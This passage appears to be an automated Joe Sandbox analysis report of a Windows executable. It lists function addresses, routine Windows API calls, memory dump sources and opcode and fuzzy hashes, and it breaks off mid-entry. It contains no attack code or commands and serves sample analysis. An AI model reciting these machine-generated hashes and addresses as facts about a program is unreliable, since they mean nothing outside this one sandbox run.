                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3850602802-0
                                                                                          • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                          • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                          • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                          • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                          • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                                                          • String ID:
                                                                                          • API String ID: 1358664141-0
                                                                                          • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                          • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                          • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                          • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 2880819207-0
                                                                                          • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                          • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                          • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                          • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                          • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                          • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                          • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 357397906-0
                                                                                          • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                          • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                          • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                          • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                          APIs
                                                                                          • __wsplitpath.LIBCMT ref: 00436A45
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                          • __wcsicoll.LIBCMT ref: 00436A93
                                                                                          • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                          • String ID:
                                                                                          • API String ID: 1187119602-0
                                                                                          • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                          • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                          • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                          • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 1597257046-0
                                                                                          • Opcode ID: a0a60491a2b11ab92cb2618fcf1664bc73e22867390c023d5d6986141a6dc3e0
                                                                                          • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                          • Opcode Fuzzy Hash: a0a60491a2b11ab92cb2618fcf1664bc73e22867390c023d5d6986141a6dc3e0
                                                                                          • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyObject$IconWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3349847261-0
                                                                                          • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                          • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                          • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                          • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                          • String ID:
                                                                                          • API String ID: 2223660684-0
                                                                                          • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                          • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                          • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                          • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                          APIs
                                                                                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                          • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                          • EndPath.GDI32(?), ref: 004472B0
                                                                                          • StrokePath.GDI32(?), ref: 004472BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                          • String ID:
                                                                                          • API String ID: 2783949968-0
                                                                                          • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                          • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                          • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                          • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 00417D1A
                                                                                            • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                            • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                          • __getptd.LIBCMT ref: 00417D31
                                                                                          • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                          • __lock.LIBCMT ref: 00417D4F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                          • String ID:
                                                                                          • API String ID: 3521780317-0
                                                                                          • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                          • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                          • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                          • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                          APIs
                                                                                          • GetDesktopWindow.USER32 ref: 00471144
                                                                                          • GetDC.USER32(00000000), ref: 0047114D
                                                                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                          • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                          • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                          • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                          APIs
                                                                                          • GetDesktopWindow.USER32 ref: 00471102
                                                                                          • GetDC.USER32(00000000), ref: 0047110B
                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                          • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                                          • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                                          • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                                          APIs
                                                                                          • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                          • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                          • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2710830443-0
                                                                                          • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                          • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                                          • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                                          • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                            • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                            • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                          • String ID:
                                                                                          • API String ID: 146765662-0
                                                                                          • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                          • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                                          • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                                          • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                                          APIs
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                            • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                          • __getptd_noexit.LIBCMT ref: 00414080
                                                                                          • __freeptd.LIBCMT ref: 0041408A
                                                                                          • ExitThread.KERNEL32 ref: 00414093
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 3182216644-0
                                                                                          • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                          • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                                          • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                                          • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharLower
                                                                                          • String ID: $8'I
                                                                                          • API String ID: 2358735015-3608026889
                                                                                          • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                          • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                          • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                                          • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                          APIs
                                                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
